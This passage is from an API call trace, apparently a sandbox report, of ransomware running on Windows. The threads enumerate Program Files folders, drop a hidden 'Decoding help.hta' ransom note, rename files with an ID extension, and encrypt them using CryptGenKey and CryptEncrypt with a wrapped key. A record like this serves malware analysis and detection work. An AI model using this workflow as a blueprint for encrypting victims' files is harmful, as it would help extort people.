ftLastWriteTime.dwLowDateTime=0x8ad1e37, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 1 [0051.899] lstrcpyW (in: lpString1=0x671fd8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0051.899] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0051.899] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0x1 [0051.900] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlxmlx.rll.mui") returned -1 [0051.900] lstrlenW (lpString="sqlxmlx.rll.mui") returned 15 [0051.900] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.900] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 57 [0051.900] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\", lpString2="sqlxmlx.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" [0051.900] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" [0051.900] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0051.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.900] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad1e37, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8ad1e37, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 0 [0051.900] FindClose (in: hFindFile=0x5d8890 | out: hFindFile=0x5d8890) returned 1 Thread: id = 597 os_tid = 0xd98 [0048.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*.*", lpFindFileData=0x904fd30 | out: lpFindFileData=0x904fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8490 [0049.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.289] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0x904fd30 | out: lpFindFileData=0x904fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.289] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.289] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0x904fd30 | out: lpFindFileData=0x904fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0049.289] FindClose (in: hFindFile=0x5d8490 | out: hFindFile=0x5d8490) returned 1 Thread: id = 598 os_tid = 0xd9c [0048.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*", lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x69acfbd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69acfbd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d10 [0049.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.844] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x69acfbd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69acfbd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.844] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.844] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.844] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5863dfb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd3478ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd3478ee0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInSideAdapters", cAlternateFileName="ADDINS~1")) returned 1 [0049.844] lstrcmpW (lpString1=".", lpString2="AddInSideAdapters") returned -1 [0049.844] lstrcmpW (lpString1="..", lpString2="AddInSideAdapters") returned -1 [0049.844] lstrcmpiW (lpString1="windows", lpString2="AddInSideAdapters") returned 1 [0050.142] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" [0050.142] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned 80 [0050.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\", lpString2="AddInSideAdapters" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters" [0050.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*.*" [0050.142] GlobalMemoryStatus (in: lpBuffer=0x914fd10 | out: lpBuffer=0x914fd10) [0050.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2507f640, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0050.203] CloseHandle (hObject=0x53c) returned 1 [0050.204] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69acfbd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd60a8740, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd60a8740, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInViews", cAlternateFileName="ADDINV~1")) returned 1 [0050.204] lstrcmpW (lpString1=".", lpString2="AddInViews") returned -1 [0050.204] lstrcmpW (lpString1="..", lpString2="AddInViews") returned -1 [0050.204] lstrcmpiW (lpString1="windows", lpString2="AddInViews") returned 1 [0050.265] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" [0050.265] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned 80 [0050.265] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\", lpString2="AddInViews" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews" [0050.265] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*.*" [0050.265] GlobalMemoryStatus (in: lpBuffer=0x914fd10 | out: lpBuffer=0x914fd10) [0050.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11591530, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f4 [0050.267] CloseHandle (hObject=0x3f4) returned 1 [0050.282] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52328bf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd33e0960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd33e0960, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contracts", cAlternateFileName="CONTRA~1")) returned 1 [0050.282] lstrcmpW (lpString1=".", lpString2="Contracts") returned -1 [0050.282] lstrcmpW (lpString1="..", lpString2="Contracts") returned -1 [0050.282] lstrcmpiW (lpString1="windows", lpString2="Contracts") returned 1 [0050.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" [0050.282] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned 80 [0050.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\", lpString2="Contracts" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts" [0050.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*.*" [0050.282] GlobalMemoryStatus (in: lpBuffer=0x914fd10 | out: lpBuffer=0x914fd10) [0050.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99bad28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f4 [0050.292] CloseHandle (hObject=0x3f4) returned 1 [0050.292] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x583906f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd60f4a00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd60f4a00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HostSideAdapters", cAlternateFileName="HOSTSI~1")) returned 1 [0050.292] lstrcmpW (lpString1=".", lpString2="HostSideAdapters") returned -1 [0050.292] lstrcmpW (lpString1="..", lpString2="HostSideAdapters") returned -1 [0050.293] lstrcmpiW (lpString1="windows", lpString2="HostSideAdapters") returned 1 [0050.296] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" [0050.296] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned 80 [0050.296] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\", lpString2="HostSideAdapters" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters" [0050.296] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*.*" [0050.296] GlobalMemoryStatus (in: lpBuffer=0x914fd10 | out: lpBuffer=0x914fd10) [0050.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x251679f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f4 [0050.299] CloseHandle (hObject=0x3f4) returned 1 [0050.299] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed38dba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x6192a2b0, ftLastAccessTime.dwHighDateTime=0x1d2dda2, ftLastWriteTime.dwLowDateTime=0xed4e4800, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1fdc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PipelineSegments.store", cAlternateFileName="PIPELI~1.STO")) returned 1 [0050.299] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" [0050.299] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned 80 [0050.299] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Decoding help.hta" [0050.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\decoding help.hta")) returned 0xffffffff [0050.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x678 [0052.613] WriteFile (in: hFile=0x678, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x914fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x914fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.156] CloseHandle (hObject=0x678) returned 1 [0053.156] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0053.157] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PipelineSegments.store") returned -1 [0053.157] lstrlenW (lpString="PipelineSegments.store") returned 22 [0053.157] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*" [0053.157] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*.*") returned 80 [0053.157] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\", lpString2="PipelineSegments.store" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store" [0053.157] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store" [0053.157] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.[ID]g9uZrLhJaygpwRm1[ID]" [0053.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.158] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x678 [0053.158] CreateFileMappingA (hFile=0x678, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x370 [0053.158] CryptAcquireContextA (in: phProv=0x914fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x914fcec*=0x3449e80) returned 1 [0054.997] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x914fce8 | out: phKey=0x914fce8*=0x5d8b90) returned 1 [0054.997] CryptExportKey (in: hKey=0x5d8b90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x914fbe4, pdwDataLen=0x914fce4 | out: pbData=0x914fbe4*, pdwDataLen=0x914fce4*=0x2c) returned 1 [0054.997] MapViewOfFile (hFileMappingObject=0x370, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1fdc0) returned 0x550000 [0055.026] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x914fbe4*, pdwDataLen=0x914fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x914fbe4*, pdwDataLen=0x914fcf8*=0x100) returned 1 [0055.026] CryptEncrypt (in: hKey=0x5d8b90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x914fce4*=0x1fdc0, dwBufLen=0x1fdc0 | out: pbData=0x550000*, pdwDataLen=0x914fce4*=0x1fdc0) returned 1 [0055.048] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0055.051] CloseHandle (hObject=0x370) returned 1 [0055.051] CryptDestroyKey (hKey=0x5d8b90) returned 1 [0055.051] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0055.052] SetFilePointerEx (in: hFile=0x678, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.052] WriteFile (in: hFile=0x678, lpBuffer=0x914fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x914fcf8, lpOverlapped=0x0 | out: lpBuffer=0x914fbe4*, lpNumberOfBytesWritten=0x914fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.952] WriteFile (in: hFile=0x678, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x914fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x914fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.952] CloseHandle (hObject=0x678) returned 1 [0056.952] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.515] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x914fd30 | out: lpFindFileData=0x914fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed38dba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x6192a2b0, ftLastAccessTime.dwHighDateTime=0x1d2dda2, ftLastWriteTime.dwLowDateTime=0xed4e4800, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1fdc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PipelineSegments.store", cAlternateFileName="PIPELI~1.STO")) returned 0 [0058.515] FindClose (in: hFindFile=0x5d7d10 | out: hFindFile=0x5d7d10) returned 1 Thread: id = 599 os_tid = 0xda0 [0048.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*", lpFindFileData=0x9d4fd30 | out: lpFindFileData=0x9d4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, 